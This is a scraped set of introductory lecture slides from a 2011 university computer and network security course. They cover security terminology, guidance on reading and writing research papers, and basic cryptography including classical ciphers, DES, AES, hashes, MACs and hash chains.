Computer and Network Security

Published on May 2016 | Categories: Documents | Downloads: 91 | Comments: 0 | Views: 1051
of x
Download PDF   Embed   Report

computer security lecture

Comments

Content

CIS433/533 - Computer and
Network Security
Introduction
Professor Kevin Butler
Winter 2011
Computer and Information Science

Some bedtime stories …

CIS 433/533: Computer and Network Security

2

This course
• We are going to explore why these events are not

isolated, infrequent, or even unexpected.
• Why are we doing so poorly in computing systems

at protecting our users and data from inadvertent
or intentional harm?

The answer: stay tuned!

CIS 433/533: Computer and Network Security

3

This course ...
• This course is a systems course

covering general topics in
computer and network security,
including:
‣ network security, authentication,

security protocol design and analysis,
key management, program safety,
intrusion detection, DDOS detection
and mitigation, architecture/operating
systems security, security policy,
group systems, biometrics, web
security, and other emerging topics
(as time permits)
CIS 433/533: Computer and Network Security

4

You need to understand ...
• IP Networks
• Modern Operating Systems
• Discrete Mathematics
• Basics of systems theory and implementation
‣ E.g., File systems, distributed systems, networking,

operating systems, ....

CIS 433/533: Computer and Network Security

5

Goals
‣ My goal: to provide you with the tools to understand

and evaluate research in computer security.
‣ Basic technologies
‣ Engineering/research trade-offs
‣ How to read/write/present security research papers

• This is going to be a hard course. The key to
success is sustained effort. Failure to keep up with
readings and project will likely result in poor grades,
and ultimately little understanding of the course
material.
• Pay-off: security competence is a rare, valuable skill
CIS 433/533: Computer and Network Security

6

Course Materials
• Website - I am maintaining the course website at
‣ http://ix.cs.uoregon.edu/~butler/teaching/11W/cis533/

• Course assignments, slides, and other artifacts will

be made available on the course website.
• Course textbook
‣ Stallings, W. and Brown, L.,

Computer Security: Principles
and Practice, 1st edition, Prentice
Hall, 2008.

CIS 433/533: Computer and Network Security

7

Course Calendar
• The course calendar as all the

relevant readings, assignments
and test dates
• The calendar page contains

electronic links to online papers
assigned for course readings.
• Please check the website

frequently for announcements
and changes to the schedule.
Students are responsible for
any change on the schedule.
CIS 433/533: Computer and Network Security

8

Grading (433)
• The course will be graded on exams, quizzes,

assignments, projects, and class participation in
the following proportions:
30% Quizzes and Assignments
25% Mid-term Exam
35% Final Exam
10% Class Participation

CIS 607: Security in Systems, Storage, and Clouds

9

Grading (533/Project)
• For graduate students and undergraduates

interested in performing the project option:
25% Course Research Project
20% Quizzes & Assignments
15% Mid-term Exam
25% Final Exam
10% Class Participation

• Undergrads: why do a project?
CIS 433/533: Computer and Network Security

10

Assignments, Quizzes, Reviews
• Exams
‣ Conceptual Questions (Basic and Complex)
‣ Constructions
‣ Precise Answers

• Quizzes
‣ Quick quizzes on the previous lecture and readings
‣ Review of Papers (for each class)
• Define Concepts
• Comparison with Other Approaches
• Details of Approach

• Written and Oral Reviewing Are Important
CIS 433/533: Computer and Network Security

11

Readings
• There are a large amount of readings in this course

covering various topics. These assignments are
intended to:
‣ Support the lectures in the course (provide clarity)
‣ Augment the lectures and provide a broader exposure to

security topics.

• Students are required to do the reading!
• About 10-20% of questions on the tests (and most

of the quizzes) will be off the reading on topics that
were not covered in class. You better do the
reading or you are going to be in deep trouble when
it comes to grades.
CIS 433/533: Computer and Network Security

12

Course Project
• End Result: Research Paper
‣ Motivation for an Experiment
‣ Background
‣ Related Work
‣ Experimental Approach
‣ Experimental Evaluation

• I will provide sample topic areas
‣ General Areas

• Start with an Existing System/Approach
‣ Break It

• Improve It
‣ Aim for a Research-Quality Result
CIS 433/533: Computer and Network Security

13

Ethics Statement
• This course considers topics involving personal and public

privacy and security. As part of this investigation we will cover
technologies whose abuse may infringe on the rights of others.
As an instructor, I rely on the ethical use of these technologies.
Unethical use may include circumvention of existing security or
privacy measurements for any purpose, or the dissemination,
promotion, or exploitation of vulnerabilities of these services.
Exceptions to these guidelines may occur in the process of
reporting vulnerabilities through public and authoritative
channels. Any activity outside the letter or spirit of these
guidelines will be reported to the proper authorities and may
result in dismissal from the class and/or institution.
• When in doubt, please contact the instructor for advice. Do not

undertake any action which could be perceived as technology
misuse anywhere and/or under any circumstances unless you
have received explicit permission from Professor Butler.
CIS 433/533: Computer and Network Security

14

What is security?
• Garfinkel and Spafford (1991)
‣ “A computer is secure if you can depend on it

and its software to behave as expected.”

• Harrison, Ruzzo, Ullman (1978)
‣ “Prevent access by unauthorized users”

• Not really satisfactory – does not truly

capture that security speaks to the
behavior of others
‣ Expected by whom?
‣ Under what circumstances?
CIS 433/533: Computer and Network Security

15

Risk
• At-risk valued resources that can be misused
‣ Monetary
‣ Data (loss or integrity)
‣ Time
‣ Confidence
‣ Trust

• What does being misused mean?
‣ Privacy (personal)
‣ Confidentiality (communication)
‣ Integrity (personal or communication)

• Availability (existential or fidelity)
• Q: What is at stake in your life?
CIS 433/533: Computer and Network Security

16

Threats
• A threat is a specific means by which an attacker can put

a system at risk
‣ An ability/goal of an attacker (e.g., eavesdrop , fraud, access

denial)
‣ Independent of what can be compromised

• A threat model is a collection of threats that deemed

important for a particular environment
‣ A collection of attacker(s) abilities
‣ E.g., A powerful attacker can read and modify all communications

and generate messages on a communication channel

• Q: What were risks/threats in the introductory examples?
‣ ZDNet
‣ Yale/Princeton
‣ Estonia
CIS 433/533: Computer and Network Security

17

Vulnerabilities (attack vectors)
• A vulnerability is a systematic artifact that

exposes the user, data, or system to a threat
• E.g., buffer-overflow, WEP key leakage
• What is the source of a vulnerability?
‣ Bad software (or hardware)
‣ Bad design, requirements
‣ Bad policy/configuration
‣ System Misuse
‣ Unintended purpose or environment
• E.g., student IDs for liquor store
CIS 433/533: Computer and Network Security

18

Adversary
• An adversary is any entity trying to

circumvent the security infrastructure
‣ The curious and otherwise generally clueless

(e.g., script-kiddies)
‣ Casual attackers seeking to understand systems
‣ Venal people with an ax to grind
‣ Malicious groups of largely sophisticated users

(e.g, chaos clubs)
‣ Competitors (industrial espionage)
‣ Governments (seeking to monitor

activities)
CIS 433/533: Computer and Network Security

19

Are users adversaries?
• Have you ever tried to circumvent the security of a

system you were authorized to access?
• Have you ever violated a security policy (knowingly

or through carelessness)?

This is know as the insider adversary!

CIS 433/533: Computer and Network Security

20

Attacks
• An attack occurs when someone attempts to

exploit a vulnerability
• Kinds of attacks
‣ Passive (e.g., eavesdropping)
‣ Active (e.g., password guessing)
‣ Denial of Service (DOS)
• Distributed DOS – using many endpoints

• A compromise occurs when an attack is successful
‣ Typically associated with taking over/altering resources
CIS 433/533: Computer and Network Security

21

Participants
• Participants are expected system entities
‣ Computers, agents, people, enterprises, …
‣ Depending on context referred to as: servers, clients,

users, entities, hosts, routers, …
‣ Security is defined with respect to these entitles
• Implication: every party may have unique view

• A trusted third party
‣ Trusted by all parties for some set of

actions
‣ Often used as introducer or arbiter
CIS 433/533: Computer and Network Security

22

Trust
• Trust refers to the degree to which an entity is

expected to behave
• What the entity not expected to do?
‣ E.g., not expose password

• What the entity is expected to do (obligations)?
‣ E.g., obtain permission, refresh

• A trust model describes, for a particular

environment, who is trusted to do what?
• Note: you make trust decisions every day
‣ Q: What are they?
‣ Q: Whom do you trust?
CIS 433/533: Computer and Network Security

23

Security Model
• A security model is the combination of a trust and threat models

that address the set of perceived risks
‣ The “security requirements” used to develop some cogent and

comprehensive design
‣ Every design must have security model



LAN network or global information system
Java applet or operating system

• The single biggest mistake seen in use of security is the lack of a

coherent security model
‣ It is very hard to retrofit security (design time)

• This class is going to talk a lot about security models
‣ What are the security concerns (risks)?

‣ What are the threats?
‣ Who are our adversaries?

• Who do we trust and to do what?
• Systems must be explicit about these things to be secure.
CIS 433/533: Computer and Network Security

24

A Security Model Example
• Assume we have a University website that hosts

courses through the web (e.g., Blackboard)
‣ Syllabus, other course information
‣ Assignments submissions
‣ Online Grading

• In class: elements of the security model
‣ Participants (Trusted)
‣ Adversaries
‣ Risks
‣ Threats
CIS 433/533: Computer and Network Security

25

Next Class
• Personal profile
‣ Who are you? Background? Why are you taking this

class? Particular interests in the area? Preferred email for
addition to mailing list?
‣ Use LaTeX to do this: Project reports will require LaTeX,

so might as well learn it now...
‣ Send it to me by midnight tomorrow

• Read Thompson paper, “Reflections on Trusting

Trust”
‣ Should be on course website by end of the day (if not

already there)
CIS 433/533: Computer and Network Security

26

CSE433/533 - Computer and
Network Security
Security Research Methods
Professor Kevin Butler
Winter 2011
Computer and Information Science

Reading papers …
• What is the purpose of reading papers?
• How do you read papers?

CIS 433/533: Computer and Network Security

2

Understanding what you read
• Things you should be getting out of a paper
‣ What is the central idea proposed/explored in the
paper?
• Abstract
• Introduction
• Conclusions

These are the best areas to
find an overview of the
contribution

‣ How does this work fit into others in the area?
• Related work - often a separate section, sometimes not, every
paper should detail the relevant literature. Papers that do not
do this or do a superficial job are almost sure to be bad ones.
• An informed reader should be able to read the related work
and understand the basic approaches in the area, and how
they differ from the present work.
CIS 433/533: Computer and Network Security

3

Understanding what you read (cont.)
• What scientific devices are the authors using to

communicate their point?
‣ Methodology - this is how they evaluate their
solution.
• Theoretical papers typically validate a model using

mathematical arguments (e.g., proofs)
• Experimental papers evaluate results based on test

apparatus (e.g., measurements, data mining, synthetic
workload simulation, trace-based simulation).
‣ Empirical research evaluates by measurement.
• Some papers have no evaluation at all, but argue the

merits of the solution in prose (e.g., paper design papers)
CIS 433/533: Computer and Network Security

4

Understanding what you read (cont.)
• What do the authors claim?
‣ Results - statement of new scientific discovery.
• Typically some abbreviated form of the results will be

present in the abstract, introduction, and/or conclusions.
• Note: just because a result was accepted into a

conference or journal does necessarily not mean that it is
true. Always be circumspect.

• What should you remember about this paper?
‣ Take away - what general lesson or fact should you
take away from the paper.
‣ Note that really good papers will have take-aways
that are more general than the paper topic.
CIS 433/533: Computer and Network Security

5

Summarize Thompson Article
• Contribution
• Motivation
• Related work
• Methodology
• Results
• Take away

CIS 433/533: Computer and Network Security

6

A Sample Summary
• Contribution: Ken Thompson shows how hard it is to trust the security of










software in this paper. He describes an approach whereby he can embed a
Trojan horse in a compiler that can insert malicious code on a trigger (e.g.,
recognizing a login program).
Motivation: People need to recognize the security limitations of programming.
Related Work: This approach is an example of a Trojan horse program. A
Trojan horse is a program that serves a legitimate purpose on the surface,
but includes malicious code that will be executed with it. Examples include
the Sony/BMG rootkit: the program provided music legitimately, but also
installed spyware.
Methodology: The approach works by generating a malicious binary that is
used to compile compilers. Since the compiler code looks OK and the
malice is in the binary compiler compiler, it is difficult to detect.
Results: The system identifies construction of login programs and
miscompiles the command to accept a particular password known to the
attacker.
Take away: What is the transcendent truth????? (see next slide)

CIS 433/533: Computer and Network Security

7

Turtles all the way down ...
• Take away: Thompson states the “obvious” moral that “you cannot trust code

that you did not totally create yourself.” We all depend on code, but
constructing a basis for trusting it is very hard, even today.
• ... or “trust in security is an infinite regression ...”
“A well-known scientist (some say it was Bertrand Russell) once
gave a public lecture on astronomy. He described how the earth
orbits around the sun and how the sun, in turn, orbits around
the center of a vast collection of stars called our galaxy. At the
end of the lecture, a little old lady at the back of the room got up
and said: "What you have told us is rubbish. The world is really
a flat plate supported on the back of a giant tortoise." The
scientist gave a superior smile before replying, "What is the
tortoise standing on?" "You're very clever, young man, very
clever", said the old lady. "But it's turtles all the way down!"
- Hawking, Stephen (1988). A Brief History of
Time.
CIS 433/533: Computer and Network Security

8

Reading a paper
• Everyone has a different way of reading a paper.
• Here are some guidelines I use:
‣ Always have a copy to mark-up. Your margin notes will serve

as invaluable sign-posts when you come back to the paper
(e.g., “here is the experimental setup” or “main result
described here”)
‣ After reading, write a summary of the paper containing

answers to the questions in the preceding slides. If you can’t
answer (at least at a high level) these questions without
referring to the paper, it may be worth scanning again.

• Over the term, try different strategies for reading

papers and see which one is the most effective for you.
CIS 433/533: Computer and Network Security

9

Reading a systems security paper
• What is the security model?
‣ Who are the participants and adversaries
‣ What are the assumptions of trust (trust model)
‣ What are the relevant risks/threats
• What are the constraints?
‣ What are the practical limitations of the environment
‣ To what degree are the participants available
• What is the solution?
‣ How are the threats reasonably addressed
‣ How do they evaluate the solution
• What is the take away?
‣ key idea/design, e.g., generalization (not solely

engineering)
• Hint: I will ask these questions when evaluating course
project.
CIS 433/533: Computer and Network Security

10

Course Projects
• The course project requires the students execute

some limited research in security.
‣ Demonstrate applied knowledge
‣ Don’t try to learn some new non-security field
‣ Be realistic about what is possible in a one quarter.
‣ However, the work should reflect real thought and effort.

• The grade will be based on: novelty, depth,

correctness, clarity of presentation, and effort.
• Structure
‣ 1-4 students per group
‣ Single person suggested if you will work in security.
CIS 433/533: Computer and Network Security

11

Deliverables
• The chief product of the project will be a 10-15 page

conference style paper. There will be several
milestones:
‣ Project Choice (1/13/11)
‣ Abstract, Background and Related Work (1/27/11)
‣ Experiment Proposal (2/10/11)
‣ Project Status Slides (2/24/11)
‣ Project Presentation (3/10/11)
‣ Final Project Write-up (3/13/11)

• This is a very important factor in your grade (30%)
‣ An exceptionally good (poor) project may help (kill) grade
CIS 433/533: Computer and Network Security

12

Project Choice
• Due on Jan 13, 5:00 PM
• Order list of projects
‣ Choose three projects in order of interest

• Choose up to 3 collaborators (optional)
‣ Get a sense of groupings

• I will approve/choose your project and group
‣ Hopefully, I can resolve the constraints implied
‣ One group per project
‣ A functional group
CIS 433/533: Computer and Network Security

13

Topic Examples
• Web systems
‣ Evaluate the security of PHP, Apache extension ...

• Operating systems
‣ Create your own Linux security module to monitor all system

calls and measure inter-process communication (*)
• Cloud Systems
‣ Design a cloud component for ensuring data security

• User Studies
‣ Measure the effectiveness of passwords, card systems

• Network security
‣ Build a intrusion detection system that watches IM msgs (*)

• Note: picking a topic is very important, and should

almost certainly involve an area that you know well
CIS 433/533: Computer and Network Security

14

Why write a paper?
• There are many reasons to write a paper:
‣ Articulate a new idea, thought, or observation ...
‣ Document your research ...
‣ Talk about new (observed) phenomenon ....
‣ Advance your career ...
‣ Because you have to ...
• Reality: publication is the coin of the realm in science,

failure to do this successfully will lead to failure. You have
to be effective at this to be a good (a) graduate student,
(b) faculty member, or [sometimes] (c) researcher in
professional research laboratory (IBM/AT&T/MS)
CIS 433/533: Computer and Network Security

15

Where to publish?
• Venues for publication:
‣ Tech report
‣ Workshop
‣ Conference
‣ Journal

• Often your work will work through

these from preliminary to archival
versions of the work, sometimes
branching or joining.

• Book: less frequent, more work.
CIS 433/533: Computer and Network Security

16

Publication Tiers
• Not all publication venues are valued the same.

Publication “tiers” tell the story
• 1st tier - IEEE S&P, USENIX Sec, CCS,

TISSEC, JCS
‣ 1.5 NDSS

• 2nd tier - ACSAC, ACNS, ESORICS, CSF,

RAID, TOIT
• 3rd tier - SecureComm, ICISS
• 4th tier - HICSS
‣ SCIgen (WMSCI 2005)
CIS 433/533: Computer and Network Security

17

Journal publication
EIC Assign
AE

• The editor-in-chief (EIC)

Start

receives the papers as they
are submitted.

AE Assign
to
Reviewers

• The papers are assigned to
Assign to
Reviewer

Assign to
Reviewer

Assign to
Reviewer

Author
Prepare
Revision

associate editors for handling.
• Anonymous reviewers rate the

Review
Assign
Rating

Review
Assign
Rating

paper:

Review
Assign
Rating

Major Revision
or
Minor Revision

‣ Minor revision

AE
Evaluate

Reject

Reject

‣ Accept without changes

Accept

Accept

CIS 433/533: Computer and Network Security

‣ Major revision
‣ Reject
18

Conference Publication
• The PC Chair is the

Start

person who marshals the
reviewing and decisions of
a conference. This is
different than the general
chair.

Chair
Assign to
PC
Members

PC
Member
Assign
Rating

Reject

PC
Member
Assign
Rating

No

PC
Member
Assign
Rating

• PC members review, rate

and discuss, the paper,
then vote on which ones
are accepted.

Discuss at
PC Meeting?

• The acceptance rate is the
PC
Meeting
Discussion

CIS 433/533: Computer and Network Security

Accept

ratio of accepted to
submitted papers.
19

Paper evaluation
• A paper is evaluated on
‣ Novelty
‣ Correctness
‣ Impact
‣ Presentation
‣ Relevance
‣ “hotness”

CIS 433/533: Computer and Network Security

20

Parts of a paper
• Parts of paper (vast generalization)

1.Abstract
2.Introduction
3.Related Work/Background
4.Solution/Problem
5.Evaluation/Analysis/Experiment
6.Discussion (often, but not always)
7.Conclusions
CIS 433/533: Computer and Network Security

21

Abstract
• One sentence each for:
‣ Area
• Topic of work
‣ Problem
• What’s the issue?
‣ Solution
• How do you propose to address the problem?
‣ Methodology
• What’s the experiment?
‣ Results
• What did you find?
‣ Take Away: Lesson
CIS 433/533: Computer and Network Security

22

Introduction
• One paragraph each on:
• Area
‣ More elaborate

• Problem
‣ Scenario

• Why is problem not solved
‣ Brief of related work or the challenge

• Proposed insight (“In this paper, ...”)
‣ What is the experiment?

• Contributions -- What will the reader learn?
• Boilerplate outline (?)
CIS 433/533: Computer and Network Security

23

Related work/Background
• This is a statement of the work that led to this one.
‣ who this work relies on
‣ who has done work in the area
‣ areas that inspired this work (not just technology)

• There are several reasons for related work section:
‣ Motivate the current work
‣ Differentiate from past work
‣ Establish “bona fides”

• Background
‣ Outline the Problem
• May use an example scenario
‣ Material Related to the Solution
• Why hasn’t it been solved
CIS 433/533: Computer and Network Security

24

Background and Experiment
• Experiment
‣ Means of showing truth
‣ Big Insight -- Hypothesis -- Claim
• Show why it is interesting

‣ Expected Results
• Informal proof/argument that is true

• Experiment types
‣ Empirical - measure some aspect of the solution
‣ Analytical - prove something about solution
‣ Observational - show something about solution
CIS 433/533: Computer and Network Security

25

Implementation and Results
• Implementation: Experimental Platform
‣ Exact specification of platform
‣ Design may have more than implementation -- what did
you implement?
‣ How are key design features/mechanisms implemented?
• Results
‣ Summarize -- what do the results mean?
‣ Specific experiments
• We did X, saw Y

‣ What do the experiments prove
‣ What other experiments would you want to do based on

these results?
CIS 433/533: Computer and Network Security

26

Conclusion
• Like the abstract in past tense
• Problem
‣ What was the problem?
• Solution
‣ What was the insight and why was it expected
to work?
• Method and Results
‣ What did you find?
• Take away: Lesson
• Future work
CIS 433/533: Computer and Network Security

27

Hint
• Intro: tell them what you are going to tell them
• Body: tell them
• Conclusion: tell them what you told them.

CIS 433/533: Computer and Network Security

28

CIS433/533 - Computer and
Network Security
Cryptography

Professor Kevin Butler
Winter 2011
Computer and Information Science

A historical moment …
• Mary Queen of Scots is being

held by Queen Elizabeth …
‣ … and accused of treason.
‣ All communication with co-

conspirators encrypted.
‣ Cipher was “unbreakable”.

• Walsingham needs to prove

complicity.

CIS 433/533: Computer and Network Security

2

Intuition
• Cryptography is the art (and sometimes science) of

secret writing
‣ Less well known is that it is also used to guarantee other

properties, e.g., authenticity and integrity of data
‣ This is an mathmatically deep and important field
‣ However, much of our trust in cryptographic systems is

based on faith (particularly in efficient secret key
algorithms)
‣ … ask Mary Queen of Scots how that worked out.

• This set of lectures will provide the intuition and

some specifics of modern cryptography, seek others
for additional details (Menezes et. al.).
CIS 433/533: Computer and Network Security

3

Cryptography
• Cryptography (cryptographer)
‣ Creating ciphers

• Cryptanalysis (cryptanalyst)
‣ Breaking ciphers

• The history of cryptography is an arms race
between cryptographers and cryptanalysts
CIS 433/533: Computer and Network Security

4

Encryption algorithm
• Algorithm used to make content unreadable by all

but the intended receivers

Encrypt(plaintext,key) = ciphertext
Decrypt(ciphertext,key) = plaintext
• Algorithm is public, key is private
• Block vs. Stream Ciphers
‣ Block: input is fixed blocks of same length
‣ Stream: stream of input
CIS 433/533: Computer and Network Security

5

Hardness and security ...
• Functions
‣ Plaintext P
‣ Ciphertext C
‣ Encryption (E) key ke
‣ Decryption (D) key kd

D(E(P, ke),kd) = P
• Computing P from C is hard, computing P from C with kd
‣ Is easy for all Ps (operation true for all inputs) ...
‣ ... except in some vanishingly small number of cases
CIS 433/533: Computer and Network Security

6

Example: Caesar Cipher
• Substitution cipher
• Every character is replaced with the character three

slots to the right
A B C D E F G H I J K L MN O P Q R S T U VWX Y Z
D E F G H I J K L MN O P Q R S T U VWX Y Z A B C

• Q: What is the key?
S E C U R I T Y A N D P R I V A C Y
V H F X U L W B D Q G S U L Y D F B

CIS 433/533: Computer and Network Security

7

Cyptanalyze this ….

“BERTBA ARGJBEX
FRPHEVGL”

CIS 433/533: Computer and Network Security

8

Cryptanalysis of ROTx Ciphers
• Goal: to find plaintext of encoded message
• Given: ciphertext
• How: simply try all possible keys
‣ Known as a brute force attack

1 T F D
2 U G E
3 W H F
S E C

V
W
X
U

S
T
U
R

J
K
L
I

CIS 433/533: Computer and Network Security

U
V
W
T

Z
A
B
Y

B
C
D
A

M
N
Q
N

E
F
G
D

Q
R
S
P

S
T
U
R

J
H
L
I

W
X
Y
V

B
C
D
A

D
E
F
C

Z
A
B
Y

9

Attacking a Cipher
• The attack mounted will depend on what

information is available to the adversary
‣ Ciphertext-only attack: adversary only has the ciphertext

available and wants to determine the plaintext encrypted
‣ Known-plaintext attack: adversary learns one or more
pairs of ciphertext/plaintext encrypted under the same
key, tries to determine plaintext based on a different
ciphertext
‣ Chosen-plaintext attack: adversary can obtain the
encryption of any plaintext, tries to determine the plaintext
for a different ciphertext
‣ Chosen-ciphertext attack: adversary can obtain the
plaintext of any ciphertext except the one the adversary
wants to decrypt
CIS 433/533: Computer and Network Security

10

Shared key cryptography
• Traditional use of cryptography
• Symmetric keys, where a single key (k) is used is

used for encryption (E) and decryption (D)

D(E(p,k),k) = p
• All (intended) receivers have access to key
• Note: Management of keys determines who has

access to encrypted data
‣ E.g., password encrypted email

• Also known as symmetric key cryptography
CIS 433/533: Computer and Network Security

11

Key size and algorithm strength
• Key size is an oft-cited measure of the strength of

an algorithm, but is strength strongly correlated (or
perfectly correlated with key length)?
‣ Say we have two algorithms, A and B with key sizes of

128 and 160 bits (the common measure)
‣ Is A less secure than B?
‣ What if A=B (for variable key-length algorithms)?

• Terminology: key length is the security parameter.

CIS 433/533: Computer and Network Security

12

Is there an unbreakable cipher?
• As it turns out, yes ….
‣ (Claude Shannon proved it)

CIS 433/533: Computer and Network Security

13

The one-time pad (OTP)
• Assume you have a secret bit string s of length n

known only to two parties, Alice and Bob
‣ Alice sends a message m of length of n to Bob
‣ Alice uses the following encryption function to generate

ciphertext bits:

n

i=0

ci = mi ⊕ ki

• E.g., XOR the data with the secret bit string

‣ An adversary Mallory cannot retrieve any part of the data

• Simple version of the proof of security:
‣ Assume for simplicity that value of each bit in m is equally

likely, then you have no information to work with.
CIS 433/533: Computer and Network Security

14

Data Encryption Standard (DES)
• Introduced by the US NBS

(now NIST) in 1972
• Signaled the beginning of

the modern area of
cryptography
• Block cipher
‣ Fixed sized input

• 8-byte input and a 8-byte

key (56-bits+8 parity bits)

CIS 433/533: Computer and Network Security

15

Breaking Ciphers
• Brute force cryptanalysis
‣ Just keep trying different keys and check result (early

breaks)

• Linear cryptanalysis
‣ Construct linear equations relating plaintext, ciphertext and

key bits that have a high bias; that is, whose probabilities of
holding (over the space of all possible values of their
variables) are as close as possible to 0 or 1
‣ Use these linear equations in conjunction with known
plaintext-ciphertext pairs to derive key bits.

• Differential cryptanalysis
‣ study of how differences in an input can affect the resultant

difference at the output (showing non-random behavior)
‣ Use chosen plaintext to uncover key bits
CIS 433/533: Computer and Network Security

16

Substitution Box (S-box)
• A substitution box (or S-box) is used to obscure the

relationship between the plaintext and the ciphertext
‣ Shannon's property of confusion: the relationship between

key and ciphertext is as complex as possible.
‣ In DES S-boxes are carefully chosen to resist

cryptanalysis.
‣ Thus, that is where the security comes from.

Example: Given a 6-bit input, the 4-bit output is found by selecting the row using the
outer two bits, and the column using the inner four bits. For example, an input "011011"
has outer bits "01" and inner bits "1101"; the corresponding output would be "1001".
CIS 433/533: Computer and Network Security

17

Cryptanalysis of DES
• DES has an effective 56-bit key length
• Wiener: $1,000,000 - 3.5 hours (never built)
• July 17, 1998, the EFF DES Cracker, which was built

for less than $250,000 < 3 days
• January 19, 1999, Distributed.Net (w/EFF), 22 hours

and 15 minutes (over many machines)
• We all assume that NSA and agencies like it around

the world can crack (recover key) DES in
milliseconds

• What now? Give up on DES?
CIS 433/533: Computer and Network Security

18

Variants of DES
• DESX (XOR with separate keys ~= 60-bits)
‣ Linear cryptanalysis

• Triple DES (three keys ~= 112-bits)
k1 , k2 , k3
‣ keys

C = E(D(E(p, k1 ), k2 , k3 )
1
k

p

E

CIS 433/533: Computer and Network Security

2
k

D

k3
E

c
19

Advanced Encryption Standard (AES)
• International NIST bakeoff between cryptographers
‣ Rijndael (pronounced “Rhine-dall”)

• Replacement for DES/accepted symmetric key

cipher
‣ Substitution-permutation network, not a Feistel network
‣ Variable key lengths
‣ Fast implementation in hardware and software
‣ Small code and memory footprint

CIS 433/533: Computer and Network Security

20

Public Key Cryptography
• Public Key cryptography
‣ Each key pair consists of a public and private

component: k+ (public key), k- (private key)
D(E(p, k ), k ) = p
+



D(E(p, k ), k ) = p


+

• Public keys are distributed (typically)

through public key certificates
‣ Anyone can communicate secretly with you if

they have your certificate
‣ E.g., SSL-based web commerce
CIS 433/533: Computer and Network Security

21

Hash Algorithms
• Hash algorithm
‣ Compression of data into a hash value
‣ E.g., h(d) = parity(d)
‣ Such algorithms are generally useful in algorithms
(speed/space optimization)
• … as used in cryptosystems
‣ One-way - (computationally) hard to invert h() , i.e.,
compute h-1(y), where y=h(d)
‣ Collision resistant hard to find two data x1 and x2 such
that h(x1) == h(x2)
• Q: What can you do with these constructs?
CIS 433/533: Computer and Network Security

22

Hash Functions
• Design a “strong cryptographic hash function”
• No formal basis
‣ Concern is backdoors

• MD2
‣ Substitution based on pi

• MD4, MD5
‣ Similar, but complex functions in multiple passes

• SHA-1
‣ 160-bit hash
‣ “Complicated function”
CIS 433/533: Computer and Network Security

23

Message Authentication Code
• MAC
‣ Used in protocols to authenticate content, authenticates

integrity for data d
‣ To simplify, hash function h(), key k, data d

M AC(k, d) = h(k ⊕ d)

‣ E.g., XOR the key with the data and hash the result

• Q: Why does this provide integrity?
‣ Cannot produce mac(k,d) unless you know k and d
‣ If you could, then can invert h()
CIS 433/533: Computer and Network Security

24

HMAC
• MAC that meets the following properties
‣ Collision-resistant
‣ Attacker cannot computer proper digest without knowing K
• Even if attacker can see an arbitrary number of digests H(k+x)

• Simple MAC has a flaw
‣ Block hash algorithms mean that new content can be

added
‣ Turn H(K+m) to H(K+m+m’) where m’ is controlled by an

attacker

• HMAC(K, d) = H(K + H(K + d))
‣ Attacker cannot extend MAC as above
‣ Prove it to yourself
CIS 433/533: Computer and Network Security

25

Birthday Attack
• A birthday attack is a name used to refer to a class of
brute-force attacks.
– birthday paradox : the probability that two or more people
in a group of 23 share the same birthday is >than 50%

• General formulation
– function f() whose output is uniformly distributed
– On repeated random inputs n = { n1, n2, , .., nk }
• Pr(ni = nj) = 1.2k1/2, for some 1 <= i,j <= k, 1 <= j < k, i != j
• E.g., 1.2(3651/2) ~= 23

• Q: Why is resilience to birthday attacks

important?
CIS 433/533: Computer and Network Security

26

Using hashes as authenticators


Consider the following scenario
‣ Prof. Alice has not decided if she will cancel the next

lecture.
‣ When she does decide, she communicates to Bob the

student through Mallory, her evil TA.
‣ She does not care if Bob shows up to a cancelled class
‣ Alice does not trust Mallory to deliver the message.



She and Bob use the following protocol:
1. Alice invents a secret t
2. Alice gives Bob h(t), where h() is a crypto hash function
3. If she cancels class, she gives t to Mallory to give to Bob
– If does not cancel class, she does nothing
– If Bob receives the token t, he knows that Alice sent it

CIS 433/533: Computer and Network Security

27

Hash Authenticators
• Why is this protocol secure?
– t acts as an authenticated value (authenticator) because
Mallory could not have produced t without inverting h()
– Note: Mallory can convince Bob that class is occurring
when it is not by simply not delivering h(t) (but we assume
Bob is smart enough to come to that conclusion when the
room is empty)

• What is important here is that hash preimages are

good as (single bit) authenticators.
• Note that it is important that Bob got the original

value h(t) from Alice directly (was provably authentic)
CIS 433/533: Computer and Network Security

28

Hash chain
• Now, consider the case where Alice wants to do the

same protocol, only for all 26 classes (the semester)
• Alice and Bob use the following protocol:
1.Alice invents a secret t
2.Alice gives Bob H26(t), where H26() is 26 repeated uses of H().
3.If she cancels class on day d, she gives H(26-D)(t) to Mallory,
e.g.,
If cancels on day 1, she gives Mallory H25(t)
If cancels on day 2, she gives Mallory H24(t)
…….
If cancels on day 25, she gives Mallory H1(t)
If cancels on day 26, she gives Mallory t

4.If does not cancel class, she does nothing
– If Bob receives the token t, he knows that Alice sent it
CIS 433/533: Computer and Network Security

29

Hash Chain (cont.)
• Why is this protocol secure?
‣ On day d, H(26-d)(t) acts as an authenticated value

(authenticator) because Mallory could not create t without
inverting H() because for any Hk(t) she has k>(26-d)
‣ That is, Mallory potentially has access to the hash values

for all days prior to today, but that provides no information
on today’s value, as they are all post-images of today’s
value
‣ Note: Mallory can again convince Bob that class is

occurring by not delivering H(26-d)(t)
‣ Chain of hash values are ordered authenticators

• Important that Bob got the original value H26(t) from

Alice directly (was provably authentic)
CIS 433/533: Computer and Network Security

30

Basic truths of cryptography …
• Cryptography is not frequently the source of

security problems
‣ Algorithms are well known and widely studied
• Use of crypto commonly is … (e.g., WEP)

‣ Vetted through crypto community
‣ Avoid any “proprietary” encryption
‣ Claims of “new technology” or “perfect security” are

almost assuredly snake oil

CIS 433/533: Computer and Network Security

31

Common issues that lead to pitfalls
• Generating randomness
• Storage of secret keys
• Virtual memory (pages

secrets onto disk)
• Protocol interactions
• Poor user interface
• Poor choice of key length,

prime length, using
parameters from one
algorithm in another
CIS 433/533: Computer and Network Security

32

CIS 433/533 - Computer and
Network Security
Public Key Crypto/
Cryptographic Protocols
Professor Kevin Butler
Winter 2010
Computer and Information Science

Key Distribution/Agreement
• Key Distribution is the process where we assign

and transfer keys to a participant
‣ Out of band (e.g., passwords, simple)
‣ During authentication (e.g., Kerberos)
‣ As part of communication (e.g., skip-encryption)

• Key Agreement is the process whereby two parties

negotiate a key
‣ 2 or more participants

• Typically, key distribution/agreement this occurs in

conjunction with or after authentication.
‣ However, many applications can pre-load keys
CIS 433/533: Computer and Network Security

2

Key Distribution
• Say we used pairwise key distribution/agreement in

this class (strictly symmetric cryptography)
• Q: how many key negotiations would there

be?
• 36481 ASes in the Internet: how many

negotiations for secure routing solutions?

